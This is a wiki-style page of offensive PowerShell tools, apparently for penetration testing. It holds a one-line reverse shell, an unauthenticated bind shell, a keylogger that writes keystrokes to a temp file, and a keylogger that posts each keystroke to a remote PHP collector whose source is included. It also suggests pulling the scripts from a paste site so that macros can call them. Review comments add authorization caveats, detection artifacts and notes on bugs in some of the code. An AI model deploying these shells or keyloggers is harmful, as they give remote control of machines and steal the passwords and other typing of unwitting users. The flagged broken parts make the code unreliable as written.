Useful Scripts

Powershell

These scripts are also stored at [http://pastebin.com/u/powershell] so they can be called from macros. Note that anything fetched from a paste site at run time executes whatever is hosted there at that moment — pin the content you tested (e.g. compare a hash) rather than trusting the URL, and keep local copies for engagement evidence.

Reverse Shell (update $address and $port to your listener before using; the connection is plaintext and unauthenticated, so use it only against systems you are authorized to test)

# Reverse shell, packed onto one line so it can be pasted as a single command.
# Connects OUT to $address:$port, starts cmd.exe with stdin/stdout redirected,
# sends cmd.exe's banner, then relays newline-terminated input from the socket
# to cmd.exe and cmd.exe's output back over the socket until the peer
# disconnects or cmd.exe exits. Traffic is plaintext ASCII with no authentication.
# Only defined helper: ReverseShellClean (closes the client and the process, then exits).
# NOTE(review): the "client no longer connected" branch calls `cleanup`, which is
# not defined anywhere on this page (only ReverseShellClean is), and the
# `{ReverseShellClean};  else {` sequence puts a statement terminator between the
# `if` block and `else`, so PowerShell will not treat that `else` as part of the
# `if` — confirm the one-liner parses before relying on it. `$testing` is never read.
# Detection-relevant artifacts: powershell.exe spawning cmd.exe with redirected
# handles, plus an outbound TCP connection owned by the PowerShell process.
function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};if ($process.ExitCode -ne $null) {$process.Close()};  exit; }  $address = '127.0.0.1';  $port = '12345';  $client = New-Object system.net.sockets.tcpclient;   $client.connect($address,$port) ;  $stream = $client.GetStream();  $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;  $process = New-Object System.Diagnostics.Process  ;  $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;  $process.StartInfo.RedirectStandardInput = 1  ;  $process.StartInfo.RedirectStandardOutput = 1;  $process.StartInfo.UseShellExecute = 0  ;  $process.Start()  ;  $inputstream = $process.StandardInput  ;  $outputstream = $process.StandardOutput  ;  Start-Sleep 1  ;  $encoding = new-object System.Text.AsciiEncoding  ;  while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};  $stream.Write($encoding.GetBytes($out),0,$out.Length)  ;  $out = $null; $done = $false; $testing = 0;   while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;  $pos = 0;   $i = 1;    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);    $pos+=$read;  if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;  if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);   $inputstream.write($string);    start-sleep 1;    if ($process.ExitCode -ne $null) {ReverseShellClean};  else {  $out = $encoding.GetString($outputstream.Read());   while($outputstream.Peek() -ne -1){;   $out += $encoding.GetString($outputstream.Read());   if ($out -eq $string) {$out = ''}};    $stream.Write($encoding.GetBytes($out),0,$out.length);    $out = $null;    $string = $null};  } else {ReverseShellClean}};

Bind shell (listens on every interface on port 12345 with no authentication — anyone who can reach the port gets cmd.exe running as your user; restrict the bind address or firewall the port while it is up)

# Bind shell: listens on ALL interfaces (IPAddress.Any) on $port, accepts one TCP
# client, starts cmd.exe with stdin/stdout redirected, and relays newline-terminated
# input from the socket to cmd.exe and cmd.exe's output back to the socket.
# No authentication, no encryption: whoever reaches the port gets cmd.exe as the
# user running this script. Authorized-engagement use only.
# $listener, $socket and $process are never stopped/closed on any exit path.
function BindShell {

$port = "12345"
$encoding = new-object System.Text.AsciiEncoding
# IPAddress.Any == 0.0.0.0; change this if the shell should only be reachable
# on one interface.
$endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, $port)
$listener = new-object System.Net.Sockets.TcpListener $endpoint
$listener.start()
# Blocks until the first client connects; only that one client is ever served.
$socket = $listener.AcceptTcpClient()
$networkstream = $socket.GetStream()
$networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput

Start-Sleep 1

# Drain cmd.exe's startup banner and send it to the client before reading input.
while($outputstream.Peek() -ne -1){
    $string += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($string),0,$string.Length)
$string = ''
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    # Accumulate bytes until a newline (byte 10) is seen or the buffer is full.
    # $i is never modified, so those are the only two ways out. NOTE(review): if
    # Read() returns 0 because the peer closed the connection, $pos stays 0 and
    # this loop spins — TODO confirm whether Read() throws instead on your .NET
    # version (an exception would terminate the whole script).
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
                    $read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {
            break
        }
    }
    if ($pos -gt 0) {
        # Forward the received line (newline included) to cmd.exe's stdin.
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)

        # Write Output
        # Read() blocks for the first output char, then Peek() drains the rest
        # that is currently available; output produced later is picked up on
        # the next command.
        $out = $encoding.GetString($outputstream.Read())
        while($outputstream.Peek() -ne -1){
            $out += $encoding.GetString($outputstream.Read())
        }
        $networkstream.Write($encoding.GetBytes($out),0,$out.length)
        $out = $null
    }
    # Only reached with $pos -eq 0, which the inner loop above never yields as
    # written, so this exit path appears unreachable — TODO confirm.
    else {$done = $true}
}          
}
# Starts the listener immediately when the file is run; blocks in
# AcceptTcpClient() until a client connects and never returns afterwards.
bindshell

Keylogger to local files (runs until the PowerShell process is killed; writes every keystroke in the interactive session, credentials included, in clear text under %TEMP% — authorized engagements only)

# Keylogger (local file). Polls every virtual-key code 1..254 roughly every 40 ms
# via user32!GetAsyncKeyState, translates newly pressed keys to text with
# user32!ToUnicode, and appends the resulting characters to %TEMP%\audit.
# Runs forever (while $true) — there is no stop condition; kill the process to
# end it. Authorized-engagement use only: it captures everything typed in the
# session, including passwords.
# Detection-relevant artifacts: Add-Type compiles the P/Invoke stubs at run time
# (on Windows PowerShell this typically spawns csc.exe under powershell.exe and
# creates Win32Functions.* types), continuous GetAsyncKeyState polling from the
# PowerShell process, and files written under %TEMP%.
function KeyLog {    
# MapVirtualKey map-type constants; only $MAPVK_VSC_TO_VK_EX is used below.
$MAPVK_VK_TO_VSC = 0x00    
$MAPVK_VSC_TO_VK = 0x01    
$MAPVK_VK_TO_CHAR = 0x02    
$MAPVK_VSC_TO_VK_EX = 0x03    
$MAPVK_VK_TO_VSC_EX = 0x04
# P/Invoke signatures for the four user32 calls, compiled by Add-Type below.
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@    
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@    
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@    
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru    
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru    
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru    
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {        
Start-Sleep -Milliseconds 40        
$gotit = ""        
for ($char = 1; $char -le 254; $char++)
{$vkey = $char            
$gotit = $getKeyState::GetAsyncKeyState($vkey)            
# -32767 is 0x8001 as a signed short — presumably "key is down now AND was
# pressed since the last call"; see the GetAsyncKeyState documentation.
if ($gotit -eq -32767)
# $l_shift, $r_shift and $caps_lock are computed but never read afterwards;
# shift/caps handling comes from the keyboard state passed to ToUnicode.
{$l_shift = $getKeyState::GetAsyncKeyState(160)                
$r_shift = $getKeyState::GetAsyncKeyState(161)                
$caps_lock = [console]::CapsLock                
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)                
$kbstate = New-Object Byte[] 256                
$checkkbstate = $getKBState::GetKeyboardState($kbstate)                
$mychar = New-Object -TypeName "System.Text.StringBuilder";                
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)                
# ToUnicode returns the number of characters written; 0 or negative means the
# key produced no printable text (modifiers, dead keys, function keys).
if ($unicode_res -gt 0)
{
$keys = $mychar.ToString()
$temp = "$env:temp\audit"
$logfile = "$env:temp\Logging"
# Each translated character is appended (with a newline) to %TEMP%\audit.
add-content $temp $keys
# Reads %TEMP%\Logging back and rewrites it with its own contents; nothing on
# this page ever appends keys to $logfile, so its purpose is unclear — TODO confirm.
$text = [string]::Join("`n", (Get-Content $logfile))
Write-Output $text > $logfile
}}}}}
# Starts the logger as soon as the file runs; KeyLog never returns.
KeyLog

Keylogger to HTTP POST (sends one plaintext HTTP request per keystroke to the hard-coded $url — update it before use; authorized engagements only)

# PHP Code for logging of keys
# FYI - you need to create a writable keylogs/ folder for the PHP script to write to.
# Note: $file is taken straight from $_POST['filename'] and concatenated into the path
# unsanitised, so a filename containing "../" writes outside keylogs/; pass it through
# basename() and put authentication in front of this endpoint before exposing it.
#
# <?php
# $saving = $_REQUEST['saving'];
# if ($saving == "1"){
# $data = $_POST['data'];
# $file = $_POST['filename'];
#
# $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
# fwrite($fp, $data) or die("Couldn't write values to file!");
# fclose($fp);
# }
# ?>

# Keylogger (HTTP POST). Same capture loop as the local-file version above —
# polls virtual-key codes 1..254 every ~40 ms via user32!GetAsyncKeyState and
# translates presses with user32!ToUnicode — but instead of writing locally it
# issues one HTTP POST per keystroke to the hard-coded $url through the
# Msxml2.XMLHTTP COM object, using the form fields the PHP receiver above
# expects (saving=1, data, filename=<computername>-<yyyyMMdd>-keys.txt).
# Plain HTTP: the keystrokes cross the network unencrypted. Runs forever;
# kill the process to stop it. Authorized-engagement use only.
# Detection-relevant artifacts: run-time Add-Type compilation (Win32Functions.*
# types, typically a csc.exe child on Windows PowerShell), continuous
# GetAsyncKeyState polling, and a high rate of small POSTs to one URL from the
# PowerShell process.
function KeyLog {    
# MapVirtualKey map-type constants; only $MAPVK_VSC_TO_VK_EX is used below.
$MAPVK_VK_TO_VSC = 0x00    
$MAPVK_VSC_TO_VK = 0x01    
$MAPVK_VK_TO_CHAR = 0x02    
$MAPVK_VSC_TO_VK_EX = 0x03    
$MAPVK_VK_TO_VSC_EX = 0x04
# P/Invoke signatures for the four user32 calls, compiled by Add-Type below.
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@    
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@    
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@    
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru    
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru    
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru    
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {        
Start-Sleep -Milliseconds 40        
$gotit = ""        
for ($char = 1; $char -le 254; $char++)
{$vkey = $char            
$gotit = $getKeyState::GetAsyncKeyState($vkey)            
# -32767 is 0x8001 as a signed short — presumably "key is down now AND was
# pressed since the last call"; see the GetAsyncKeyState documentation.
if ($gotit -eq -32767)
# $l_shift, $r_shift and $caps_lock are computed but never read afterwards.
{$l_shift = $getKeyState::GetAsyncKeyState(160)                
$r_shift = $getKeyState::GetAsyncKeyState(161)                
$caps_lock = [console]::CapsLock                
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)                
$kbstate = New-Object Byte[] 256                
$checkkbstate = $getKBState::GetKeyboardState($kbstate)                
$mychar = New-Object -TypeName "System.Text.StringBuilder";                
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)                
# ToUnicode returns the number of characters written; 0 or negative means the
# key produced no printable text (modifiers, dead keys, function keys).
if ($unicode_res -gt 0)
{$keydate = get-date -format yyyyMMdd

# One log file per host per day on the receiving side.
$logfile = "$env:computername-$keydate-keys.txt"  
$url = "http://myserver/storage/PostKeys.php"
$parameters = "saving=1&data=$keys&filename=$logfile"

$keys = $mychar.ToString()
# Synchronous (third argument $false) POST; the loop waits for each response
# before polling the keyboard again.
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open('POST', $url, $false)
$http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length)
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
}}}}}

# Starts the HTTP variant immediately; never returns. This is the second
# `function KeyLog` on the page — if the whole page were run as one file this
# definition would replace the earlier one (which, being an infinite loop,
# would never have returned control anyway). Each snippet is meant to be run on its own.
KeyLog

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License